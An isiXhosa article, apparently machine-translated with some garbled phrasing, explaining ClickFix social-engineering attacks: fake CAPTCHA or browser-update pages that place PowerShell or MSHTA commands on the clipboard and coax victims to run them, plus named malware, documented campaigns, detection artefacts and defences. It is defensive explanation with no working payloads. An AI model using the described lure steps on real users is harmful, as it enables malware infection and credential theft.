Yintoni uhlaselo lweClickFix kwaye lusebenza njani ngokweenkcukacha?

Informatec Digital » Izibonelelo » Yintoni uhlaselo lweClickFix kwaye lusebenza njani ngokweenkcukacha?

Uhlaselo lweClickFix lube yenye yezona ndlela zifashisayo zobunjineli bezentlalo Ehlabathini lolwaphulo-mthetho lwe-cybercrime: amaphulo abonakala engenabungozi, enezilumkiso ze-browser ezingeyonyani okanye ukuhlolwa kokhuseleko, kodwa ekugqibeleni kubangele ukuba umsebenzisi asebenzise ikhowudi engalunganga kwikhompyuter yakhe, phantse engakhange ayiqonde.

Kude nokuba nomdla wobugcisa, i-ClickFix sele ibonwe kumaphulo okwenyani eLatin America, eYurophu nakweminye imimandla., ukusasaza abathengisi bolwazi, iitrojans ezikude (iiRAT) kunye nezilayishi ezinzima ezifana ne-GHOSTPULSE okanye iNetSupport RAT, kunye nokuthatha ithuba leevidiyo zeTikTok okanye izifundo zokufundisa zikaYouTube ukufikelela amawaka amaxhoba.

Yintoni kanye kanye uhlaselo lweClickFix?

I-ClickFix yindlela yamva nje yobunjineli bezentlalo (eyaziwa ukususela ngo-2024) esekelwe kwinto elula kakhulu: ukukholisa umsebenzisi ukuba akhuphe kwaye aqhube imiyalelo kwindlela yakhe "ukulungisa" ingxaki yobugcisa ecingelwa ukuba okanye ukugqiba ukuqinisekiswa.

Endaweni yokukhuphela inkqubo enobungozi ngokuthe ngqo, iwebhusayithi enobungozi ifaka iscript okanye umyalelo kwibhodi eqhotyoshwayo. (umzekelo, i-PowerShell kwi-Windows okanye kwi-MSHTA imiyalelo) kwaye emva koko ibonisa imiyalelo yesinyathelo-nge-nyathelo ukuze ixhoba liyincamathisele kwaye liyiqhube kwikhonsoli, i-Run box, okanye i-terminal.

Eli qhinga lixhaphaza oko abaphandi abaninzi bakubiza ngokuba "kukudinwa kokuqinisekisa"Abasebenzisi bajwayele ukucofa ngokukhawuleza amaqhosha afana ne "Ndingumntu", "Yilungise" okanye "Hlaziya ngoku" ngaphandle kokuhlalutya umyalezo kakhulu, obenza babe sesichengeni kakhulu xa isikrini sibonakala njengokuqinisekiswa kwe-Cloudflare, i-Google CAPTCHA okanye i-Google Dibana okanye i-Zoom impazamo.

Igama le-ClickFix livela ngokuchanekileyo kumaqhosha adla ngokuvela kule mijelongeetekisi ezinje ngo "Yilungise", "Indlela yokuyilungisa", "Lungisa ngoku" okanye "Sombulula umba", enika ingcamango yokuba umsebenzisi usebenzisa isisombululo esikhawulezayo, xa ngokwenene bakhuphela kwaye baqalise iskripthi esikhuphela i-malware.

Uhlaselo lweClickFix lusebenza njani inyathelo ngenyathelo

Nangona kukho iinguqulelo ezininzi, phantse lonke uhlaselo lweClickFix lulandela ulandelelwano oluqhelekileyo. edibanisa iiwebhusayithi ezisengozini, izikripthi zeJavaScript ezinobungozi, kunye "nokunyanzeliswa" kokungenelela komsebenzisi ukwenza ikhowudi.

Inyathelo lokuqala lidla ngokundwendwela iwebhusayithi esemthethweni eye yachaphazeleka okanye iphepha elikhohlakeleyo elithe ngqo., apho ixhoba lifikelela kwikhonkco kwi-imeyile yokukhohlisa, iziphumo ze-injini yokukhangela ekhohlakeleyo (i-SEO ekhohlakeleyo), iintengiso ezikhohlakeleyo okanye nakwi-TikTok okanye ividiyo ye-YouTube enamaqhinga okusebenzisa isoftware ehlawulweyo.

Elo phepha libonisa isilumkiso sobuxoki okanye isiqinisekiso esilinganisa ingxaki yobugcisa.: impazamo yokulayisha uxwebhu, ukungaphumeleli kohlaziyo lwesikhangeli, imakrofoni okanye iingxaki zekhamera kwi-Google Meet/Zoom, okanye i-anti-bot ecinga ukuba ijonga njenge-Cloudflare okanye i-reCAPTCHA ekuthintela ukuba uqhubeke ngaphandle kokuba kukho into "elungisiweyo".

Ngokukhawuleza xa umsebenzisi ecofa iqhosha elithi "correct" okanye ajonge ibhokisi ethi "Ndingumntu".Iskripthi seJavaScript sitofa ngokuzenzekelayo umyalelo ongalunganga kwibhodi eqhotyoshwayo, ngokwesiqhelo ngumyalelo wePowerShell okanye weMSHTA oya kuthi emva koko ukhuphele elinye iqhekeza lemalware kwiseva ekude.

Iwebhusayithi ibonisa isikhokelo esineenkcukacha ukuze ixhoba liphumeze loo myalelo., umzekelo:

• Cofa iqhosha elithi "Yilungise" ukuze "ukope ikhowudi yesisombululo".
• Cofa Win+R ukuvula i-Run window kwiWindows.
• Cinezela u-Ctrl+V ukuncamathisela okukwibhodi eqhotyoshwayo (umyalelo okhohlakeleyo).
• Cofa u-Enter "ukulungisa ingxaki" okanye uqhubeke nokuqinisekisa.

Kumahluko ahambele phambili ngakumbi, iqhinga lenziwa ngeWin + X okanye ngeconsole yesikhangeliUmsebenzisi uyalelwa ukuba avule i-terminal ye-PowerShell ngamalungelo omlawuli ukusuka kwimenyu ekhawulezayo (Win + X) okanye ukusebenzisa i-console yesiphequluli (F12 okanye i-Ctrl + Shift + I) kwaye unamathisele ibhloko yekhowudi yeJavaScript okanye "ukuqinisekisa" umsebenzi apho.

Emva kokuba umyalelo wenziwe, lonke usulelo lukhula ngasemva.Isikripthi sikhuphela amanye amacandelo kumyalelo kunye nolawulo (C2) iiseva, i-decompresses iifayile, yenza ii-DLL ezinobungozi ngokulayishwa kwecala, kwaye iphetha ngokufaka i-infostealers okanye i-RAT kwimemori okanye kwidiski.

Kutheni le nto i-ClickFix kunzima kangaka ukuyibona

Enye yeenzuzo ezinkulu zeClickFix kubahlaseli kukuba idlula imiqobo emininzi yokhuseleko lwemveli.kuba ikhonkco losulelo libonakala liqala kumsebenzisi ngokwalo kwaye hayi kwifayile ekhutshelweyo okanye i-classic exploit.

Akunyanzelekanga ukuba kubekho uncamathiselo olukrokrisayo okanye oluphunyezwayo olukhutshelwe ngokuthe ngqo kwisikhangeli.Oku kuthetha ukuba izihluzi ze-imeyile ezininzi, izithinteli zokukhuphela, kunye nokukhangela isidima se-URL ababoni nantoni na ekhohlakeleyo kwisigaba sokuqala.

Umyalelo uphunyezwa "kwiqokobhe elithembekileyo" lenkqubo, njengePowerShell, cmd.exe, okanye isikhangeli se-console.Oku kunika i-malware inkangeleko yomsebenzi osemthethweni kwaye yenza nzima umsebenzi weenkqubo ze-antivirus ezisekelwe kwisiginitsha kunye nezinye izisombululo zokhuseleko ezingekho kakuhle kakhulu kuhlalutyo lokuziphatha.

Iimveliso zokhuseleko zifumanisa isoyikiso emva kokuba umthwalo sele uphunyeziwe. okanye iinzame zokudibanisa kwiinkqubo ezikhuselweyo, ukuguqula iifayile ezibalulekileyo ezifana nefayile yenginginya, ukuseka ukuzingisa, okanye ukunxibelelana nomncedisi weC2; oko kukuthi, kwisigaba emva kokuxhaphaza.

Ngelo xesha, umhlaseli unokufumana ukufikelela okubalulekileyo kwinkqubo.: amalungelo akhulayo, ubusela beenkcukacha, ukuhamba ecaleni kuthungelwano loshishino, okanye nokuzama ukukhubaza i-antivirus kunye nezinye iileya zokhuselo.

Apho i-ClickFix ibonakala isebenza: amajelo aqhelekileyo kunye nezixhobo

Uphando olwenziwe ziilebhu zokhuseleko ezahlukeneyo lubonise ukuba iClickFix isetyenziswa kuluhlu olukhulu lwamaphulo, ejoliswe kubo bobabini abasebenzisi basekhaya kunye neenkampani kumacandelo abalulekileyo.

Abahlaseli bahlala bethembela kwezi tshaneli ukuba bafake i-ClickFix imirhumo:

• Iiwebhusayithi ezisemthethweni zichaphazelekile, apho bafaka khona izikhokelo zeJavaScript ezifana ne-ClearFake ukubonisa uhlaziyo olungeyonyani okanye izaziso zokuqinisekisa.
• Intengiso ekhohlakeleyo (ubugwenxa)ngakumbi iibhena kunye neentengiso ezixhaswayo eziqondisa ngokutsha kwisoftware yobuxoki yokukhuphela okanye amaphepha okuqinisekisa isikhangeli.
• Izifundo kunye neevidiyo kwiYouTube okanye kwiTikTok, ngamaqhinga okutyholwa ukwenza isoftware isebenze okanye uvule iimpawu zeprimiyamu simahla.
• Iiforam zenkxaso yobugcisa bobuxoki kunye neewebhusayithi ezilingisa ii-portal zoncedo, apho "kucetyiswa" ukuqhuba imiyalelo yokulungisa iimpazamo zesistim.

KwiLatin America, iimeko sele zibhaliwe apho iiwebhusayithi ezisemthethweni kunye neyunivesithi ziye zachatshazelwa.Ngokomzekelo, iwebhusayithi yeSikole sobuNjineli bezoShishino kwiYunivesithi yamaKatolika yaseChile okanye iwebhusayithi yePolisa Housing Fund yasePeru, eyaphela ibonisa iClickFix ihamba kwiindwendwe zabo.

Iiarhente zokhuseleko zase-US ziye zalumkisa ngamaphulo ajolise kubasebenzisi abafuna imidlalo, abafundi bePDF, iibrowser zeWeb3, okanye usetyenziso lwemiyalezo.Konke oku kwenziwa ngokusebenzisa uphendlo lwemihla ngemihla ukuqondisa kwakhona kumaphepha aphumeza i-ClickFix.

Amaphulo aye abonwa ukuba axhomekeke kuGoogle Meet, Zoom, DocuSign, Okta, Facebook, okanye Cloudflare amaphepha., apho impazamo yesikhangeli okanye ukuqinisekiswa kweCAPTCHA kubonisiwe, ukunyanzela umsebenzisi ukuba alandele ulandelelwano lokukopa kunye nokwenza imiyalelo.

Eyona malware eqhelekileyo isasazwe ngeClickFix

I-ClickFix ayifane ibe kuphela kweqhekeza lohlaseloIdla ngokuba yivector yokuqala evumela ukuthunyelwa kwekhonkco losulelo olunamanqanaba amaninzi kunye neentlobo ezininzi ze-malware.

Phakathi kwezona ntsapho zibalaseleyo ziye zabonwa kumaphulo akutshanje:

• Abafaki bezinto ezifana neVidar, iLumma, iStealc, iDanabot, iAtomic Stealer okanye iOdyssey Stealer, ngokukhethekileyo ekubiweni kweziqinisekiso zesikhangeli, iikuki, idatha yokuzalisa ngokuzenzekelayo, i-cryptocurrency wallets, i-VPN kunye ne-FTP yokuqinisekisa, njl.
• I-RATs (i-trojans yokufikelela kude) njenge-NetSupport RAT okanye i-ARECHCLIENT2 (i-SectopRAT)evumela abahlaseli ukuba balawule inkqubo, baphumeze imiyalelo, bakhuphe ulwazi, kwaye baqalise izigaba ezilandelayo, kuquka iransomware.
• Izilayishi eziphambili ezifana ne-GHOSTPULSE, iLatrodectus, okanye i-ClearFakeesebenza njengeglu, ukukhuphela, ukususa uguqulelo oluntsonkothileyo kunye nokulayisha ezi ziqwenga zilandelayo kwinkumbulo, rhoqo ngoomaleko abacokisekileyo be-obfuscation kunye noguqulelo oluntsonkothileyo.
• Izixhobo zobusela ulwazi lwemali kunye noshishino, ekhupha idatha kwiifom, abathengi be-imeyile, imiyalezo, kunye nezicelo zoshishino.

Kwimikhankaso esebenzayo ngo-2024 kunye no-2025, i-ClickFix ibonwe isondla amatyathanga anzima.Umzekelo, i-ClickFix decoy eyazisa i-PowerShell ikhuphela ifayile ye-ZIP equlethe ukuphunyezwa okusemthethweni (okufana ne-Java's jp2launcher.exe) kunye ne-DLL enobungozi, kwaye ngokulayishwa ecaleni iphetha ngokuqhuba i-NetSupport RAT kwikhompyuter.

Enye imeko eqhelekileyo kukusetyenziswa kwe-MSHTA ene-obfuscated URLs kwi-domain ezifana ne-iploggerco, elinganisa ukucutha okusemthethweni kwe-IP okanye iinkonzo zokubhalisa; ukusuka apho iskripthi se-PowerShell esifakwe kwi-Base64 siyakhutshelwa esiphela sikhupha i-Lumma Stealer stagers okanye ezifanayo.

Izifundo zobomi bokwenyani kunye namaphulo afakiweyo ngeClickFix

Iingxelo ezivela kumaqela amaninzi eempendulo zeziganeko kunye neelebhu zokhuseleko zichonge amaphulo amaninzi asebenzayo ejikeleza iClickFix njengendawo yokungena.

Kwicandelo loshishino, impembelelo ephawulekayo iye yabonwa kumacandelo afana ubuchwephesha obuphambili, iinkonzo zezemali, ukwenziwa, ukuthengisa kunye norhwebo oluthe kratya, ulawulo loluntu, iinkonzo zobungcali kunye nezomthetho, amandla kunye nezinto eziluncedo, phakathi kwezinye ezininzi.

Kwiphulo likaMeyi ka-2025, abahlaseli basebenzise i-ClickFix ukuhambisa i-NetSupport RAT ngokusebenzisa amaphepha omgunyathi alinganisa i-DocuSign kunye ne-Okta, ithatha ithuba leziseko ezingundoqo ezinxulumene nesakhelo se-ClearFake ukutofa iJavaScript eyenze ibhodi eqhotyoshwayo.

NgoMatshi nango-Epreli ka-2025, ukwanda kwezithuthi kwiindawo ezilawulwa yintsapho yaseLatrodectus kwabhalwa., eyaqala ukusebenzisa i-ClickFix njengendlela yokuqala yokufikelela: i-portal ephazamisekileyo eqondiswe kwakhona kwisiqinisekiso sobuxoki, ixhoba liqhube i-PowerShell ukusuka kwi-Win+R kwaye oku kukhuphela i-MSI eye yawisa i-DLL enobungozi libcef.dll.

Ngokunxuseneyo, amaphulo okuchwetheza adityaniswe neLumma Stealer achongiwe.Kolu hlaselo, amaxhoba acelwa ukuba aphumeze imiyalelo ye-MSHTA eyalatha kwimimandla elinganisa iplogger; le miyalelo ikhutshelwe kakhulu i-Obfuscated PowerShell izikripthi eziye zagqiba ukuthomalalisa iipakethe ezinokuphunyezwa njenge-PartyContinued.exe kunye nemixholo ye-CAB (Boat.pst) ukuseta i-injini yokubhala ye-AutoIt enoxanduva lokusungula inguqulelo yokugqibela ye-Lumma.

I-Elastic Security Labs ikwachaze amaphulo apho iClickFix isebenza njengekhonkco lokuqala le-GHOSTPULSE.ethi yona ilayishe isilayishi se-.NET esiphakathi kwaye ekugqibeleni ifake i-ARECHCLIENT2 kwinkumbulo, idlula iindlela ezifana ne-AMSI ngokuhuka kunye ne-obfuscation ephezulu.

Kwibala labasebenzisi bokugqibela, abathengisi abaninzi babonise imizekelo eyenziwe lula yohlaselo lweClickFix apho iphepha elithi "uhlaziyo lwebrowser" okanye iCAPTCHA yomgunyathi ikhuphela ngokuthe cwaka iskripthi kwibhodi eqhotyoshwayo kwaye emva koko inyanzela umsebenzisi ukuba ayincamathisele kwiPowerShell ngamalungelo omlawuli, ikwenza kube lula ukuqhagamshelwa kwiziseko ezingundoqo zeC2 kunye nokukhuphela inkqubo yokuguqula inkqubo.

Enye into exhalabisa kakhulu kukufika kweClickFix kwiTikTok.Iividiyo ezenziwe nge-AI zikhuthaza "iindlela ezilula" zokuvula iinguqulelo ezihlawulelwayo zasimahla zeOfisi, iSpotify Premium okanye iinkqubo zokuhlela, kodwa eneneni zikhokela abasebenzisi ukuba bakope kwaye bancamathisele imiyalelo engalunganga efaka i-infostealers njengeVidar okanye iStealc.

Abahlalutyi bafumanisa njani usulelo lweClickFix

Nangona kunokubonakala ngathi ngumlingo omnyama kumsebenzisi, usulelo lweClickFix lushiya umkhondo wobugcisa. ukuba amaqela okuzingela isoyikiso kunye nee-EDR angasebenzisa ukufumanisa isiganeko.

Kwiimeko-bume ze-Windows, enye yamanqaku ohlalutyo liqhosha lokubhalisa le-RunMRU., egcina imiyalelo yamva nje ephunyeziweyo kwi Baleka ifestile (Win+R):

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Explorer\RunMRU

Abahlalutyi baphonononga la mangeniso befuna iipateni ezikrokrisayo.: imiyalelo efihliweyo, ukusetyenziswa kwe-PowerShell okanye i-MSHTA enee-URL ezingaqhelekanga, iifowuni kwiindawo ezingaziwayo, okanye iimbekiselo zezixhobo zolawulo ezingasetyenziswanga ngumsebenzisi oqhelekileyo.

Xa abahlaseli besebenzisa ukwahluka kweWin+X (imenyu yokufikelela ngokukhawuleza) ukundulula iPowerShell okanye iCommand PromptUmkhondo ufumaneka kwinkqubo yetelemetry: inkqubo yokudala iziganeko (ezifana ne-ID 4688 kwilog yokhuseleko yeWindows) apho i-explorer.exe ivelisa i-powershell.exe kanye emva kokucofa Win+X.

Unxulumano nezinye iziganeko, ezinjengofikelelo kwi%LocalAppData%\Microsoft\Windows\WinX\fowulda okanye uqhagamshelo lomsebenzi womnatha okrokrelekayo emva koko kuphunyezo.Oku kunceda ukucacisa indlela yokuziphatha eqhelekileyo yosulelo lweClickFix, ngakumbi ukuba iinkqubo ezifana ne-certutil.exe, mshta.exe, okanye i-rundll32.exe zivela kwangoko emva koko.

Enye iVector yokubona kukusetyenziswa kakubi kwebhodi eqhotyoshwayoUkucoca i-URL ephucukileyo kunye nezisombululo zokhuseleko ze-DNS zinokuchonga iJavaScript ezama ukufaka imiyalelo engalunganga kwibhodi eqhotyoshwayo buffer, esebenza ukuvala iphepha phambi kokuba umsebenzisi agqibe ukulandelelana.

Yintoni abahlaseli abazama ukuyiphumeza ngobuchule beClickFix?

Emva kwayo yonke le nto yobunjineli bezentlalo kukho injongo ecacileyo: ukufumana inzuzo yezoqoqosho kulwazi olubiweyo., zombini ukusuka kubasebenzisi kunye nemibutho.

I-Infostealers esetyenziswe ngeClickFix yenzelwe ukuqokelela iziqinisekiso, iikuki, kunye nedatha ebuthathaka. ezigcinwe kwiibhrawuza, abathengi be-imeyile, izicelo zenkampani okanye i-cryptocurrency wallets, kunye namaxwebhu angaphakathi kunye neenkcukacha zemali.

Ngeso sixhobo, abadlali abakhohlakeleyo banokuqhuba izenzo ezininzi zolwaphulo-mthetho:

• Iinkampani zokurhwebaisoyikisa ngokukhupha ulwazi oluyimfihlo malunga nombutho okanye abathengi bawo.
• Ukwenza ubuqhophololo bemali ngokuthe ngqo ngokusebenzisa ii-akhawunti zebhanki ezisengozini, iinkqubo zokuhlawula kwi-intanethi, okanye i-crypto wallets.
• Ukulinganisa inkampani okanye abasebenzi bayo ukwenza ubuqhophololo ngokuchasene nabantu besithathu, obufana nobuqhetseba obuqhelekileyo be-CEO okanye uhlaselo lwe-BEC.
• Ukuthengisa iziqinisekiso kunye neepakethe zedatha kwiwebhu emnyama aza kusebenzisa amanye amaqela olwaphulo-mthetho kuhlaselo lwexesha elizayo.
• Ukwenza ubuntlola boshishino okanye lwe-geopolitical xa ekujoliswe kuko ngumbutho othile okanye icandelo lobuchule.

Kumaphulo amaninzi abhaliweyo, i-ClickFix ibe linyathelo lokuqala eliya kuhlaselo olukhulukubandakanya ukusasazwa kweransomware emva kokubiwa kweziqinisekiso, ukufikelela ixesha elide kuthungelwano lwamashishini, okanye ukusetyenziswa kweziseko ezingundoqo ezisengozini njengesiseko sezinye iinjongo.

Abasebenzisi kunye neenkampani banokuzikhusela njani kwiClickFix?

Ukukhusela ngokuchasene neClickFix idibanisa itekhnoloji, iindlela ezigqwesileyo, kunye nokwazisa okuninzi.kuba ikhonkco elibuthathaka elisetyenziswa bubuchule bukuziphatha komsebenzisi.

Kwinqanaba lomntu ngamnye, kukho imithetho yegolide emininzi elula kakhulu enciphisa kakhulu umngcipheko wokuwa:

• Ungaze uncamathisele ikhowudi kwikhonsoli (PowerShell, cmd, terminal, browser console) ngenxa yokuba iwebhusayithi ikucela ukuba wenze njalo.nangona isenokubonakala isemthethweni.
• Lumkela ukuqinisekiswa kwe-Cloudflare, iiCAPTCHA, okanye "uhlaziyo lwebrowser" amaphepha acela amanyathelo angaqhelekanga. ngaphaya kokunqakraza kwibhokisi okanye iqhosha.
• Gcina isikhangeli sakho, inkqubo yokusebenza, kunye nezicelo zihlala zisexesheniUkufakela iipetshi ezivela kwimithombo esemthethweni kwaye hayi kwiibhena ezingaqhelekanga okanye ii-pop-ups.
• Vula ukuqinisekiswa kwezinto ezimbini (2FA) kwiiakhawunti ezibalulekileyo, ukwenza ubomi bube nzima ngakumbi kubahlaseli nokuba bayakwazi ukubiwa igama eliyimfihlo.

Kwimeko yoshishino, ukongeza kwezi ngcebiso, iinkampani kufuneka zihambe inyathelo eliya phambili kunye nedilesi ye-ClickFix njengesoyikiso esithile ngaphakathi kwesicwangciso sabo sokhuseleko.

Amanye amanyathelo aphambili emibutho a:

• Thintela ukusetyenziswa kwezixhobo zokuphumeza umyalelo (PowerShell, cmd, MSHTA) ngokusebenzisa imigaqo-nkqubo yeqela, uluhlu lolawulo lwesicelo okanye ulungelelwaniso lwe-EDR, ukwenzela ukuba kuphela iiprofayili zobugcisa zisebenzise kwaye zihlala zingena kulo msebenzi.
• Sebenzisa i-antimalware yanamhlanje kunye nezisombululo ze-EDR ngobuchule bokubhaqa obusekwe kwindlela yokuziphatha, ekwaziyo ukuchonga iipateni zokwenziwa ezikrokrisayo naxa umsebenzisi engenelela.
• Beka iliso kwitrafikhi yothungelwano kunye noqhagamshelo oluphumayo kwimimandla enegama elibingakumbi kwiinkonzo zokunciphisa i-URL, iindawo ezintsha ezibhalisiweyo, okanye ii-TLD ezingaqhelekanga.
• Rhoqo uphonononga izinto zakudala ezifana ne-RunMRU, iilogi ze-PowerShell, kunye neziganeko zokhuseleko ukukhangela iimpawu zokusetyenziswa kakubi kwe Win+R, Win+X okanye iiconsoles zolawulo.

Intsika engundoqo luqeqesho oluqhubekayo nolwenyani lwabasebenziIkhosi yethiyori ayonelanga; kuluncedo ukwenza iimvavanyo zobunjineli bezentlalo ezilawulwayo ezilinganisa amaphulo ohlobo lwe-ClickFix, ubuqhophololo be-CEO, ubuqhetseba obuphambili, okanye ukunganyaniseki.

Ezi zifaniso zisivumela ukuba silinganise inqanaba lokuvuthwa kwabasebenzi ngokumalunga nobu buchule.Lungisa isicwangciso sokwazisa, chonga iindawo ezinomngcipheko omkhulu, kwaye uqinise inkcubeko "yokuyeka kwaye ucinge" ngaphambi kokulandela imiyalelo ekrokrisayo kwiwebhusayithi okanye kwi-imeyile.

Ngaphaya koko, kubalulekile ukuba iinkampani zilungele ukuphendula ngokukhawuleza kwisehlo: ube nezicwangciso zokuphendula ezicacileyo, amaqela akhethekileyo okanye ababoneleli, kunye neenkqubo ezichazwe kakuhle kunye neenkqubo zokuphelisa xa kukho imeko enokwenzeka ye-ClickFix okanye nayiphi na enye i-vector ye-compromise ifunyenwe.

Ukwandiswa kobuchule beClickFix kwenza kucace ukuba abahlaseli bafumene indlela esebenzayo yokuguqula umsebenzisi abe ngumntu ongaziyo.Kwaye abanqikazi ukuyidibanisa kunye ne-malware eyinkimbinkimbi, iziseko ze-C2 ezinamandla kunye namaphulo amakhulu kwiinethiwekhi zentlalo okanye iinjini zokukhangela; ukuqonda indlela esebenza ngayo, ukuqonda imiqondiso yayo kunye nokomeleza zombini iteknoloji kunye nemfundo yabasebenzisi yenza umehluko namhlanje phakathi kokubandezeleka ngokuphulwa okukhulu okanye ukunqumla ukuhlaselwa ngexesha.

Inqaku elidibeneyo:

Uzikhusela njani kwi-Interlock kunye ne-Warlock ransomware: isikhokelo esinobuchule nesisebenzayo